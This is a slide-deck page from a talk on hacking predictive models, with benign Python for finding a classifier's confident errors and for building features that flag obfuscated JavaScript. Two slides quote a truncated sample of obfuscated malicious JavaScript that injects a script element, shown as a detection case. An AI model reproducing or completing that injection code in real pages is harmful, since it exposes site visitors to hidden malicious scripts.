



































This document provides an overview of machine learning and predictive modeling techniques for hackers and data scientists. It discusses foundational concepts such as functionalism, connectionism, and black-box modeling, and covers practical techniques including feature engineering, model selection, evaluation, optimization, and popular Python libraries. It encourages an experimental approach to hacking predictive models: brute-forcing hyperparameters, fuzzing with data permutations, and social engineering within data science communities.

![Slide 2
“Do machine learning like the great [hacker] you are, not like the great machine learning expert you aren’t.” - Zinkevich
Rules of Machine Learning: Best Practices for ML Engineering (2015, Zinkevich)](https://image.slidesharecdn.com/roadsec-2018-hacking-predictive-modeling-presentation-181112033632/85/Hacking-Predictive-Modeling-RoadSec-2018-2-320.jpg)



![Error Debugging
• See where your model makes the biggest mistakes.
• Then try to fix them by creating new features.
• The sample below was confidently predicted as minified JS when it was actually obfuscated malicious JS:
`4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const _0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][`
Warsaw.js](https://image.slidesharecdn.com/roadsec-2018-hacking-predictive-modeling-presentation-181112033632/85/Hacking-Predictive-Modeling-RoadSec-2018-62-320.jpg)
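The first step on the slide above, finding where the model makes its biggest mistakes, can be sketched by ranking samples on per-sample log loss: a confidently wrong prediction (like malicious JS scored as almost certainly benign) gets the largest loss. This is a minimal sketch assuming binary labels (1 = malicious, 0 = benign) and a predicted probability for class 1; the function name `biggest_mistakes` and the toy data are hypothetical, not taken from the talk.

```python
import math
from typing import List, Tuple


def biggest_mistakes(y_true: List[int], p_pred: List[float], k: int = 5) -> List[Tuple[int, float]]:
    """Return (index, loss) for the k samples with the highest per-sample log loss.

    y_true: 0/1 labels (hypothetical convention: 1 = malicious JS).
    p_pred: predicted probability that each sample is class 1.
    A high loss means the model was confident and wrong.
    """
    eps = 1e-15  # clip probabilities so log(0) never happens
    losses = []
    for i, (y, p) in enumerate(zip(y_true, p_pred)):
        p = min(max(p, eps), 1 - eps)
        loss = -(y * math.log(p) + (1 - y) * math.log(1 - p))
        losses.append((i, loss))
    # Most confidently wrong samples first
    losses.sort(key=lambda t: t[1], reverse=True)
    return losses[:k]


# Hypothetical toy data: sample 0 is malicious but scored 2% malicious
y_true = [1, 0, 1, 0]
p_pred = [0.02, 0.10, 0.95, 0.60]
for idx, loss in biggest_mistakes(y_true, p_pred, k=2):
    print(idx, round(loss, 3))
# prints:
# 0 3.912
# 3 0.916
```

In practice you would then read the top-ranked raw samples by hand, as the slide does with the obfuscated script, and ask which signal the current features fail to capture.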



![Error Debugging
• How to fix?
• Add count of digits / count of characters
• Add a human-readability score
• Add count of “x” / count of characters
`4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const _0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][`](https://image.slidesharecdn.com/roadsec-2018-hacking-predictive-modeling-presentation-181112033632/85/Hacking-Predictive-Modeling-RoadSec-2018-63-320.jpg)
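The three features proposed on the slide above can be computed with a few lines of Python. This is a sketch under stated assumptions: "count of numbers" is read as the count of digit characters, and because the slide does not say which human-readability score to use, the `readability` value below is a hypothetical proxy (the share of characters that sit in alphabetic runs of three or more letters), not a standard metric. The function name `js_features` is likewise hypothetical.

```python
import re


def js_features(source: str) -> dict:
    """Compute the slide's three suggested features for a JS snippet."""
    n = len(source)
    if n == 0:
        return {"digit_ratio": 0.0, "x_ratio": 0.0, "readability": 0.0}
    digits = sum(ch.isdigit() for ch in source)
    xs = source.count("x")  # lowercase "x", as in the hex-escaped strings
    # Hypothetical readability proxy: fraction of characters inside
    # word-like alphabetic runs of 3+ letters (identifiers, keywords).
    wordy = sum(len(run) for run in re.findall(r"[A-Za-z]{3,}", source))
    return {
        "digit_ratio": digits / n,
        "x_ratio": xs / n,
        "readability": wordy / n,
    }


obfuscated = "x67x65x74x45x6Cx65x6Dx65x6E"  # hex for "getElemen"
readable = "getElementsByClassName"
print(js_features(obfuscated))
print(js_features(readable))
```

The hex-encoded fragment scores high on the digit and "x" ratios and zero on the readability proxy, while the plain identifier scores the opposite, which is the kind of separation that minified-but-benign code usually lacks. These columns would be appended to the existing feature set before retraining.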